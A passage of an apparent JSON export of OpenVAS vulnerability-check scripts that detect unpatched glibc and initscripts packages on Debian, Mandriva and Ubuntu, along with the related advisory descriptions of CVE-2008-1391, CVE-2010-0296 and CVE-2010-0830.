report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-alphaev67\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparcv9b\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-23T13:05:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "description": "The remote host is missing an update to glibc, eglibc\nannounced via advisory DSA 2058-1.", "modified": "2018-01-23T00:00:00", "published": "2010-06-10T00:00:00", "id": "OPENVAS:136141256231067542", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067542", "type": "openvas", "title": "Debian Security Advisory DSA 2058-1 (glibc, eglibc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2058_1.nasl 8495 2018-01-23 07:57:49Z teissa $\n# Description: Auto-generated from advisory DSA 2058-1 (glibc, eglibc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the GNU C Library (aka\nglibc) and its derivatives. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\n\nCVE-2008-1391, CVE-2009-4880, CVE-2009-4881\n\nMaksymilian Arciemowicz discovered that the GNU C library did not\ncorrectly handle integer overflows in the strfmon family of\nfunctions. If a user or automated system were tricked into\nprocessing a specially crafted format string, a remote attacker\ncould crash applications, leading to a denial of service.\n\n\nCVE-2010-0296\n\nJeff Layton and Dan Rosenberg discovered that the GNU C library did\nnot correctly handle newlines in the mntent family of functions. If\na local attacker were able to inject newlines into a mount entry\nthrough other vulnerable mount helpers, they could disrupt the\nsystem or possibly gain root privileges.\n\n\nCVE-2010-0830\n\nDan Rosenberg discovered that the GNU C library did not correctly\nvalidate certain ELF program headers. If a user or automated system\nwere tricked into verifying a specially crafted ELF program, a\nremote attacker could execute arbitrary code with user privileges.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.7-18lenny4 of the glibc package.\n\nFor the testing distribution (squeeze), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems has been fixed in\nversion 2.1.11-1 of the eglibc package.\n\nWe recommend that you upgrade your glibc or eglibc packages.\";\ntag_summary = \"The remote host is missing an update to glibc, eglibc\nannounced via advisory DSA 2058-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202058-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67542\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-10 21:49:43 +0200 (Thu, 10 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2008-1391\", \"CVE-2009-4880\", \"CVE-2009-4881\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_name(\"Debian Security Advisory DSA 2058-1 (glibc, eglibc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"glibc-source\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-alphaev67\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparcv9b\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-08T12:54:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880"], "description": "Check for the Version of initscripts", "modified": "2018-01-05T00:00:00", "published": "2010-04-06T00:00:00", "id": "OPENVAS:1361412562310830966", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830966", "type": "openvas", "title": "Mandriva Update for initscripts MDVA-2010:111 (initscripts)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for initscripts MDVA-2010:111 (initscripts)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This packages update fixes several issues in initscripts:\n\n - ensure dm-mod is loading in speedboot mode (Mdv bug #57351)\n - ensure loadkeys is called in the right order (Mdv bug #57134)\n - ensure hid is loaded in first pass for speedboot (fix Macbook login)\n - remove false check on alsa (Mdv bug #57265)\n - avoid dmraid error message (Mdv bug #55344)\";\n\ntag_affected = \"initscripts on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-03/msg00045.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830966\");\n script_version(\"$Revision: 8296 $\");\n script_cve_id(\"CVE-2009-4880\", \"CVE-2009-4881\", \"CVE-2010-0015\", \"CVE-2010-0296\",\n \"CVE-2010-0830\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 08:28:01 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-06 08:56:44 +0200 (Tue, 06 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVA\", value: \"2010:111\");\n script_name(\"Mandriva Update for initscripts MDVA-2010:111 (initscripts)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of initscripts\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"debugmode\", rpm:\"debugmode~8.99~6.4mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"initscripts\", rpm:\"initscripts~8.99~6.4mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-18T10:58:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880"], "description": "Check for the Version of initscripts", "modified": "2017-12-18T00:00:00", "published": "2010-04-06T00:00:00", "id": "OPENVAS:830966", "href": "http://plugins.openvas.org/nasl.php?oid=830966", "type": "openvas", "title": "Mandriva Update for initscripts MDVA-2010:111 (initscripts)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for initscripts MDVA-2010:111 (initscripts)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This packages update fixes several issues in initscripts:\n\n - ensure dm-mod is loading in speedboot mode (Mdv bug #57351)\n - ensure loadkeys is called in the right order (Mdv bug #57134)\n - ensure hid is loaded in first pass for speedboot (fix Macbook login)\n - remove false check on alsa (Mdv bug #57265)\n - avoid dmraid error message (Mdv bug #55344)\";\n\ntag_affected = \"initscripts on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-03/msg00045.php\");\n script_id(830966);\n script_version(\"$Revision: 8153 $\");\n script_cve_id(\"CVE-2009-4880\", \"CVE-2009-4881\", \"CVE-2010-0015\", \"CVE-2010-0296\",\n \"CVE-2010-0830\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-18 07:30:39 +0100 (Mon, 18 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-06 08:56:44 +0200 (Tue, 06 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVA\", value: \"2010:111\");\n script_name(\"Mandriva Update for initscripts MDVA-2010:111 (initscripts)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of initscripts\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"debugmode\", rpm:\"debugmode~8.99~6.4mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"initscripts\", rpm:\"initscripts~8.99~6.4mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:18:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2008-1391"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-944-1", "modified": "2017-12-01T00:00:00", "published": "2010-05-28T00:00:00", "id": "OPENVAS:840435", "href": "http://plugins.openvas.org/nasl.php?oid=840435", "type": "openvas", "title": "Ubuntu Update for glibc, eglibc vulnerabilities USN-944-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_944_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for glibc, eglibc vulnerabilities USN-944-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Maksymilian Arciemowicz discovered that the GNU C library did not\n correctly handle integer overflows in the strfmon function. If a user\n or automated system were tricked into processing a specially crafted\n format string, a remote attacker could crash applications, leading to\n a denial of service. (Ubuntu 10.04 was not affected.) (CVE-2008-1391)\n\n Jeff Layton and Dan Rosenberg discovered that the GNU C library did not\n correctly handle newlines in the mntent family of functions. If a local\n attacker were able to inject newlines into a mount entry through other\n vulnerable mount helpers, they could disrupt the system or possibly gain\n root privileges. (CVE-2010-0296)\n \n Dan Rosenberg discovered that the GNU C library did not correctly validate\n certain ELF program headers. If a user or automated system were tricked\n into verifying a specially crafted ELF program, a remote attacker could\n execute arbitrary code with user privileges. (CVE-2010-0830)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-944-1\";\ntag_affected = \"glibc, eglibc vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.04 ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-944-1/\");\n script_id(840435);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 10:00:59 +0200 (Fri, 28 May 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"944-1\");\n script_cve_id(\"CVE-2008-1391\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_name(\"Ubuntu Update for glibc, eglibc vulnerabilities USN-944-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.10.1-0ubuntu17\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n 